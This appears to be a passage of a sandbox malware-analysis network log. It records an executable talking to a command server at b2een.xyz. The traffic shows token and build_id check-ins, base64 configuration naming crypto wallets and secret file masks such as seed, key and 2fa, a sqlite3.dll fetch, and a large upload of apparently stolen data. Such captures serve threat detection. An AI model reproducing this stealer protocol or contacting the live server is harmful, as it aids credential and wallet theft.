2024-11-25 09:59:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------HCAEHJJKFCAAFHJKFBKKCont
2024-11-25 09:59:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:27 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49742	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:29 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:29 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------HDAKFCGIJKJKFHIDHIIICont
2024-11-25 09:59:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:30 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49748	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:31 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 5521 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:31 UTC	5521	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------GIDAECGDAFBAAAAAECGIContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------GIDAECGDAFBAAAAAECGIContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------GIDAECGDAFBAAAAAECGICont
2024-11-25 09:59:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:32 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49754	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:32 UTC	235	OUT	GET /sqlite3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:33 UTC	143	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 09:59:33 GMT Content-Type: text/html Content-Length: 146 Connection: close
2024-11-25 09:59:33 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49760	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:34 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:34 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------DBGHJEBKJEGHJKECAAKJCont
2024-11-25 09:59:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:35 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49766	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:37 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:37 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------HDAKFCGIJKJKFHIDHIIICont
2024-11-25 09:59:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:38 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49772	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:39 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:39 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------DGHIDHCAAKECGCBFIJDBCont
2024-11-25 09:59:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49778	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:43 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 114353 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:43 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------KECBKKEBKEBFCAAAEGDHCont
2024-11-25 09:59:43 UTC	16355	OUT	Data Raw: 47 61 57 56 74 49 45 6c 4e 73 62 63 35 50 33 58 58 6a 42 2b 76 48 34 47 75 59 74 50 44 2b 76 58 30 6d 6b 36 62 50 6f 30 56 6c 46 70 38 75 36 53 37 47 4d 75 4d 35 36 67 38 2f 68 33 39 4b 36 75 39 38 50 36 6e 70 6d 71 54 61 70 34 61 6d 68 52 70 7a 75 75 4c 4b 66 50 6c 79 48 2b 38 50 51 2f 6c 39 65 31 4e 62 56 50 47 6b 71 2b 58 48 34 65 74 59 4a 44 78 35 30 6c 32 72 4b 50 66 41 4f 61 38 75 46 56 71 37 70 4e 57 62 76 71 37 4e 4e 2f 6e 2b 4a 39 44 4f 6b 6e 5a 56 55 37 70 57 30 56 30 30 76 79 2f 41 50 46 6b 67 75 64 66 38 4e 36 64 46 38 31 78 39 74 57 36 5a 52 2f 43 69 63 6b 6e 39 66 79 4e 63 6a 34 33 2f 41 4f 52 74 75 2f 38 41 64 6a 2f 39 41 57 75 37 30 48 77 36 2b 6e 58 4d 32 70 61 6a 63 2f 62 4e 56 75 42 69 53 62 47 46 52 66 37 71 6a 73 50 38 38 56 77 6e 6a Data Ascii: GaWVtIElNsbc5P3XXjB+vH4GuYtPD+vX0mk6bPo0VlFp8u6S7GMuM56g8/h39K6u98P6npmqTap4amhRpzuuLKfPlyH+8PQ/l9e1NbVPGkq+XH4etYJDx50l2rKPfAOa8uFVq7pNWbvq7NN/n+J9DOknZVU7pW0V00vy/APFkgudf8N6dF81x9tW6ZR/Cickn9fyNcj43/AORtu/8Adj/9AWu70Hw6+nXM2pajc/bNVuBiSbGFRf7qjsP88Vwnj
2024-11-25 09:59:43 UTC	16355	OUT	Data Raw: 45 39 73 6b 67 53 32 30 6d 35 6a 52 62 2b 32 75 6c 75 62 35 2b 4e 79 32 78 6b 6b 6a 66 6e 50 51 43 4e 47 2f 77 43 42 31 44 44 72 52 6e 38 4b 57 32 6f 2b 58 70 70 57 66 54 37 32 35 6c 73 59 37 59 43 35 59 6d 65 52 49 33 52 39 6e 43 6f 53 6d 63 50 6b 4b 70 2b 55 69 6b 61 30 31 47 53 2f 75 37 36 54 55 35 47 75 72 75 32 4e 70 50 4c 74 47 58 68 77 46 32 48 6a 70 68 51 50 58 38 61 68 74 39 49 6e 74 5a 72 4b 57 47 36 43 74 59 78 76 46 62 66 75 31 49 52 58 4c 46 6c 49 49 2b 59 45 75 32 63 35 36 34 72 4a 34 48 47 79 58 76 53 2f 48 31 2f 34 48 34 6d 38 63 7a 79 36 50 77 78 37 64 4f 33 2f 41 41 37 49 74 54 31 5a 34 76 44 74 7a 72 53 51 49 45 6e 73 4c 64 59 55 38 73 42 56 75 48 4a 6a 6b 77 4f 6e 48 6c 53 6e 32 4a 55 31 72 65 49 72 35 37 58 55 4e 51 74 5a 6b 30 74 48 Data Ascii: E9skgS20m5jRb+2ulub5+Ny2xkkjfnPQCNG/wCB1DDrRn8KW2o+XppWfT725lsY7YC5YmeRI3R9nCoSmcPkKp+Uika01GS/u76TU5Guru2NpPLtGXhwF2HjphQPX8aht9IntZrKWG6CtYxvFbfu1IRXLFlII+YEu2c564rJ4HGyXvS/H1/4H4m8czy6Pwx7dO3/AA7ItT1Z4vDtzrSQIEnsLdYU8sBVuHJjkwOnHlSn2JU1reIr57XUNQtZk0tH
2024-11-25 09:59:43 UTC	16355	OUT	Data Raw: 72 69 44 76 56 37 54 76 76 7a 59 2f 35 34 50 2f 41 43 71 6d 42 56 37 54 76 39 62 4a 78 2f 79 78 66 2b 56 5a 56 76 67 59 4a 36 6e 41 79 65 39 52 47 70 58 78 6d 6f 6a 30 72 33 49 62 49 36 34 69 48 6d 6d 6e 70 53 39 61 51 31 5a 61 47 6d 6d 6e 31 2f 6c 54 6a 31 35 36 55 30 2f 67 61 47 55 68 75 41 54 54 53 61 55 6e 46 4e 50 4e 53 79 30 4a 6e 50 61 6b 50 4e 4b 54 39 61 61 54 55 4d 73 51 30 6e 34 30 70 36 39 61 62 6e 69 70 5a 51 68 48 58 72 53 64 2b 39 4c 32 70 4b 6b 59 48 50 76 54 54 30 39 71 58 38 4b 51 6e 48 57 70 59 30 4a 31 70 44 51 4f 61 44 53 4b 4f 2b 72 56 38 4f 36 4e 59 36 39 71 6f 73 74 51 69 61 53 48 59 7a 67 4b 35 55 35 48 75 4b 79 71 33 66 43 56 33 62 32 57 75 43 61 35 6d 57 47 49 52 4d 43 35 37 5a 46 65 5a 6a 6b 33 68 35 70 64 6a 77 73 74 35 66 72 Data Ascii: riDvV7TvvzY/54P/ACqmBV7Tv9bJx/yxf+VZVvgYJ6nAye9RGpXxmoj0r3IbI64iHmmnpS9aQ1ZaGmmn1/lTj156U0/gaGUhuATTSaUnFNPNSy0JnPakPNKT9aaTUMsQ0n40p69abnipZQhHXrSd+9L2pKkYHPvTT09qX8KQnHWpY0J1pDQOaDSKO+rV8O6NY69qostQiaSHYzgK5U5HuKyq3fCV3b2WuCa5mWGIRMC57ZFeZjk3h5pdjwst5fr
2024-11-25 09:59:43 UTC	16355	OUT	Data Raw: 52 52 51 41 6c 46 47 4b 4b 59 77 6f 2f 43 6c 41 6f 6f 41 54 4e 4a 54 71 54 46 49 41 78 52 6a 69 6e 43 6d 6d 67 43 4f 34 2f 34 38 37 6a 2f 72 6e 2f 41 46 46 5a 2b 6d 66 36 39 2f 38 41 63 72 51 75 63 69 79 75 50 39 7a 2b 6f 72 50 30 7a 2f 58 76 2f 75 55 34 2f 43 77 52 71 55 74 47 4b 41 4b 51 42 69 6b 70 32 4b 4d 55 68 58 47 34 70 63 55 34 43 6c 78 2f 6e 4e 46 77 75 4d 78 52 54 38 55 42 54 52 63 56 78 6f 46 47 4b 65 46 50 70 54 68 47 33 70 53 75 46 79 4c 46 4c 69 70 66 4c 78 31 49 46 4e 4f 77 64 5a 42 53 35 68 58 47 34 6f 32 30 76 6d 52 44 75 54 39 42 51 5a 30 48 53 4d 6e 36 6d 69 37 48 64 73 4e 74 4b 45 70 70 75 47 37 4b 6f 70 70 6d 6b 50 56 73 66 53 69 30 67 74 49 6d 45 5a 39 44 53 37 4d 64 63 44 38 61 72 46 32 50 56 6a 2b 64 4e 7a 52 79 73 4f 52 6c 72 35 Data Ascii: 